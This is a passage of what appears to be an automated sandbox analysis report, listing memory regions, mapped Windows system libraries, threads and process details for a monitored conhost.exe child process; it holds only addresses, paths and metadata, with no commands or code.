entry_point = 0x0 region_type = mapped_file name = "nltest.exe.mui" filename = "\\Windows\\System32\\en-US\\nltest.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\nltest.exe.mui") Region: id = 1331 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1332 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1333 start_va = 0x7ffe93c10000 end_va = 0x7ffe93c43fff monitored = 0 entry_point = 0x7ffe93c2ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1334 start_va = 0x7ffe94490000 end_va = 0x7ffe944b8fff monitored = 0 entry_point = 0x7ffe944a4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1335 start_va = 0x1db0000 end_va = 0x20e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1336 start_va = 0x7ffe940a0000 end_va = 0x7ffe940aafff monitored = 0 entry_point = 0x7ffe940a19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1337 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 34 os_tid = 0x81c Thread: id = 38 os_tid = 0x123c Thread: id = 39 os_tid = 0x13b8 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x219fd000" os_pid = "0x864" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xd30" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1249 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1250 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1251 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1252 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1253 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1254 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1255 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1256 start_va = 0x7ff7bb770000 end_va = 0x7ff7bb780fff monitored = 0 entry_point = 0x7ff7bb7716b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1257 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1258 start_va = 0x90000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1259 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1260 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1261 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1262 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1263 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1264 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1265 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1266 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1267 start_va = 0x4c0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1268 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1269 start_va = 0x7ffe8bec0000 end_va = 0x7ffe8bf18fff monitored = 0 entry_point = 0x7ffe8becfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1270 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1271 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1272 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1273 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1274 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1275 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1276 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1277 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1278 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1279 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1280 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1281 start_va = 0x7ffe92c00000 end_va = 0x7ffe92d85fff monitored = 0 entry_point = 0x7ffe92c4d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1282 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1283 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1284 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1285 start_va = 0x520000 end_va = 0x6a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1286 start_va = 0x6b0000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1287 start_va = 0x840000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1288 start_va = 0x1c40000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1289 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1290 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1291 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1292 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1293 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1294 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1295 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1296 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1297 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1298 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1299 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1300 start_va = 0x1c90000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1301 start_va = 0x1db0000 end_va = 0x20e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1302 start_va = 0x20f0000 end_va = 0x2307fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 1303 start_va = 0x2310000 end_va = 0x2520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 1304 start_va = 0x2530000 end_va = 0x2643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1305 start_va = 0x2650000 end_va = 0x2860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 1306 start_va = 0x2870000 end_va = 0x2984fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Thread: id = 35 os_tid = 0x5f8 Thread: id = 36 os_tid = 0x454 Thread: id = 37 os_tid = 0x7cc